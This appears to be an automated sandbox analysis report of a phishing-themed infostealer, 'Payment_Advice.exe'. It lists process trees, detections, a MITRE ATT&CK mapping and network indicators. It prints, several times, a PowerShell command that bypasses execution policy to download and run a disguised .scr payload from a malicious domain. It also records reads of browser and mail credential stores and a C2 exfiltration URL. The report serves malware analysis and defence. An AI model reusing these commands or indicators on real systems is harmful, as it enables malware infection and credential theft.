            Source: svchost.exe, 00000008.00000002.2453208093.000001E16762B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: wscript.exe, 00000003.00000002.1469711134.0000028FCBC10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000008.00000002.2456259290.000001E16CC5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Payment_Advice.exe, 00000002.00000002.1471316804.0000000001405000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22H
            Source: Payment_Advice.exe, 00000002.00000002.1471316804.0000000001405000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_`
            Source: powershell.exe, 00000004.00000002.1463761116.000001B4E9A62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040A3D2 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,2_2_0040A3D2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Temp\hadvices.scrProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00409570 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,2_2_00409570
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00409590 SetUnhandledExceptionFilter,2_2_00409590
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: 0.2.Payment_Advice.exe.57b0000.5.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.Payment_Advice.exe.57b0000.5.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.Payment_Advice.exe.57b0000.5.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs | Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Memory written: C:\Users\user\Desktop\Payment_Advice.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\Temp\hadvices.scr | Memory written: C:\Windows\Temp\hadvices.scr base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /S
            Source: C:\Windows\Temp\hadvices.scr | Process created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -command "invoke-webrequest -uri 'https://advising-receipts.com/hsbc/payment_advice.pdf' -outfile 'c:\users\public\payment_advice.pdf'; start-process 'c:\users\public\payment_advice.pdf'; invoke-webrequest -uri 'https://advising-receipts.com/hsbc/hadvices.scr' -outfile 'c:\windows\temp\hadvices.scr'; start-process 'c:\windows\temp\hadvices.scr'"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -command "invoke-webrequest -uri 'https://advising-receipts.com/hsbc/payment_advice.pdf' -outfile 'c:\users\public\payment_advice.pdf'; start-process 'c:\users\public\payment_advice.pdf'; invoke-webrequest -uri 'https://advising-receipts.com/hsbc/hadvices.scr' -outfile 'c:\windows\temp\hadvices.scr'; start-process 'c:\windows\temp\hadvices.scr'"
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Queries volume information: C:\Users\user\Desktop\Payment_Advice.exe VolumeInformation
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Temp\hadvices.scr VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Temp\hadvices.scr VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scr | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: 2_2_00405594 GetVersionExW,GetVersionExW,2_2_00405594
            Source: C:\Users\user\Desktop\Payment_Advice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: dump.pcap, type: PCAP
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR
            Source: C:\Windows\Temp\hadvices.scr | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Temp\hadvices.scr | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Temp\hadvices.scr | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Windows\Temp\hadvices.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: dump.pcap, type: PCAP
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 25.2.hadvices.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3e979f0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 23.2.hadvices.scr.3eb8420.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000019.00000002.2449808868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2455454438.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000019.00000002.2455454438.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000017.00000002.1415714567.0000000003E56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: hadvices.scr PID: 3024, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: hadvices.scr PID: 8336, type: MEMORYSTR
            MITRE ATT&CK Matrix (techniques listed per tactic column; numbers in brackets are the count badges shown in the original matrix cells)

            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
            Resource Development: Scripting [111], Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
            Execution: Native API [11], Exploitation for Client Execution [1], Command and Scripting Interpreter [12], PowerShell [4], Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
            Persistence: Scripting [111], DLL Side-Loading [1], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
            Privilege Escalation: DLL Side-Loading [1], Process Injection [111], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
            Defense Evasion: Disable or Modify Tools [1], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [21], Software Packing [1], Timestomp [1], DLL Side-Loading [1], Masquerading [121], Virtualization/Sandbox Evasion [41], Process Injection [111]
            Credential Access: OS Credential Dumping [1], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
            Discovery: File and Directory Discovery [2], System Information Discovery [24], Security Software Discovery [111], Process Discovery [1], Virtualization/Sandbox Evasion [41], Application Window Discovery [1], System Network Configuration Discovery [1], System Owner/User Discovery, Network Sniffing
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
            Collection: Archive Collected Data [11], Data from Local System [1], Email Collection [1], Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
            Command and Control: Ingress Tool Transfer [1], Encrypted Channel [11], Non-Standard Port [1], Non-Application Layer Protocol [2], Application Layer Protocol [23], Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1434636 | Sample: Payment_Advice.exe | Start date: 01/05/2024 | Architecture: WINDOWS | Score: 100

Node 2 (start)
  • DNS/IP: mail.qoldenfrontier.com; checkip.dyndns.org; 4 other IPs or domains
  • Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 14 other signatures
  • Started: node 12 Payment_Advice.exe; node 15 svchost.exe

Node 12 Payment_Advice.exe (graph annotation: 3)
  • Signatures: Injects a PE file into a foreign processes
  • Started: node 18 Payment_Advice.exe

Node 15 svchost.exe
  • DNS/IP: 127.0.0.1 unknown unknown

Node 18 Payment_Advice.exe (graph annotation: 7)
  • Dropped: C:\Users\user\AppData\Local\Temp\...\9D55.vbs, data
  • Started: node 21 wscript.exe

Node 21 wscript.exe (graph annotation: 1)
  • Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; 2 other signatures
  • Started: node 24 powershell.exe

Node 24 powershell.exe (graph annotations: 17 19)
  • DNS/IP: advising-receipts.com 172.67.141.195, 443, 49704, 49705 CLOUDFLARENETUS United States
  • Dropped: C:\Windows\Temp\hadvices.scr, PE32; C:\Users\Public\Payment_Advice.pdf, PDF
  • Signatures: Drops PE files with a suspicious file extension; Powershell drops PE file
  • Started: node 29 hadvices.scr; node 32 Acrobat.exe; node 34 conhost.exe

Node 29 hadvices.scr
  • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  • Started: node 36 hadvices.scr

Node 32 Acrobat.exe (graph annotations: 20 75)
  • Started: node 40 AcroCEF.exe

Node 36 hadvices.scr
  • DNS/IP: mail.qoldenfrontier.com 108.167.142.65, 49743, 49744, 49745 UNIFIEDLAYER-AS-1US United States; checkip.dyndns.com 193.122.130.0, 49720, 49728, 49730 ORACLE-BMC-31898US United States; 2 other IPs or domains
  • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Node 40 AcroCEF.exe (graph annotation: 106)
  • Started: node 42 AcroCEF.exe

Node 42 AcroCEF.exe
  • DNS/IP: 23.56.12.145, 443, 49715 AKAMAI-ASUS United States

Source | Detection | Scanner | Label | Link
Payment_Advice.exe | 29% | ReversingLabs | Win32.Trojan.Generic | -

Source | Detection | Scanner | Label | Link
C:\Windows\Temp\hadvices.scr | 100% | Joe Sandbox ML | - | -
C:\Windows\Temp\hadvices.scr | 71% | ReversingLabs | Win32.Trojan.Negasteal | -
C:\Windows\Temp\hadvices.scr | 35% | Virustotal | - | Browse

No Antivirus matches

Source | Detection | Scanner | Label | Link
reallyfreegeoip.org | 2% | Virustotal | - | Browse
mail.qoldenfrontier.com | 0% | Virustotal | - | Browse
scratchdreams.tk | 17% | Virustotal | - | Browse
advising-receipts.com | 13% | Virustotal | - | Browse
checkip.dyndns.com | 0% | Virustotal | - | Browse
checkip.dyndns.org | 0% | Virustotal | - | Browse

Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware | -
https://go.micro | 0% | URL Reputation | safe | -
https://contoso.com/License | 0% | URL Reputation | safe | -
https://contoso.com/Icon | 0% | URL Reputation | safe | -
http://checkip.dyndns.org | 0% | URL Reputation | safe | -
http://go.mic | 0% | URL Reputation | safe | -
http://go.mic | 0% | URL Reputation | safe | -
https://www.adobe.co | 0% | URL Reputation | safe | -
http://checkip.dyndns.org/ | 0% | URL Reputation | safe | -
http://checkip.dyndns.org/q | 0% | URL Reputation | safe | -
https://contoso.com/ | 0% | URL Reputation | safe | -
http://reallyfreegeoip.org | 0% | URL Reputation | safe | -
https://reallyfreegeoip.org | 0% | URL Reputation | safe | -
http://checkip.dyndns.com | 0% | URL Reputation | safe | -
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe | -
https://advising-receipts.com/hsbc/hadvices.scr | 0% | Avira URL Cloud | safe | -
http://advising-receipts.com | 0% | Avira URL Cloud | safe | -
http://crl.ver) | 0% | Avira URL Cloud | safe | -
http://mail.qoldenfrontier.com | 100% | Avira URL Cloud | malware | -
https://advising-receipts.com | 0% | Avira URL Cloud | safe | -
https://reallyfreegeoip.org/xml/149.18.24.96 | 0% | Avira URL Cloud | safe | -
https://reallyfreegeoip.org/xml/149.18.24.96$ | 0% | Avira URL Cloud | safe | -
https://scratchdreams.tk | 100% | Avira URL Cloud | malware | -
https://advising-receipts.com | 10% | Virustotal | - | Browse
http://mail.qoldenfrontier.com | 0% | Virustotal | - | Browse
http://advising-receipts.com | 13% | Virustotal | - | Browse
https://scratchdreams.tk/_send_.php?TS | 100% | Avira URL Cloud | malware | -
https://scratchdreams.tk | 16% | Virustotal | - | Browse
https://advising-receipts.com/hsbc/Payment_Advice.pdf | 0% | Avira URL Cloud | safe | -
http://scratchdreams.tk | 100% | Avira URL Cloud | malware | -
https://scratchdreams.tk/_send_.php?TS | 16% | Virustotal | - | Browse
http://scratchdreams.tk | 17% | Virustotal | - | Browse
https://advising-receipts.com/hsbc/Payment_Advice.pdf | 2% | Virustotal | - | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 172.67.177.134 | true | false | - | unknown
mail.qoldenfrontier.com | 108.167.142.65 | true | true | - | unknown
scratchdreams.tk | 172.67.169.18 | true | false | - | unknown
advising-receipts.com | 172.67.141.195 | true | true | - | unknown
checkip.dyndns.com | 193.122.130.0 | true | false | - | unknown
checkip.dyndns.org | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://advising-receipts.com/hsbc/hadvices.scr | true | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/149.18.24.96 | false | Avira URL Cloud: safe | unknown
https://scratchdreams.tk/_send_.php?TS | false | 16%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://advising-receipts.com/hsbc/Payment_Advice.pdf | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
Name / Source / Malicious / Antivirus Detection / Reputation (one record per URL):

Name: http://nuget.org/NuGet.exe
  Source: powershell.exe, 00000004.00000002.1456507128.000001B490070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

Name: http://pesterbdd.com/images/Pester.png
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmp
  Malicious: true
  Antivirus Detection: URL Reputation: malware
  Reputation: unknown

Name: http://www.apache.org/licenses/LICENSE-2.0.html
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480232000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high

Name: http://advising-receipts.com
  Source: powershell.exe, 00000004.00000002.1386246749.000001B481ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1386246749.000001B4815DD000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: 13%, Virustotal, Browse; Avira URL Cloud: safe
  Reputation: unknown

Name: https://go.micro
  Source: powershell.exe, 00000004.00000002.1386246749.000001B480C32000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://contoso.com/License
  Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://contoso.com/Icon
  Source: powershell.exe, 00000004.00000002.1456507128.000001B4901B3000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown

Name: https://g.live.com/odclientsettings/ProdV21C:
  Source: svchost.exe, 00000008.00000003.1274341677.000001E16CA80000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr
  Malicious: false
  Reputation: high

Name: http://crl.ver)
  Source: svchost.exe, 00000008.00000002.2455799913.000001E16CC00000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: low

Name: http://checkip.dyndns.org
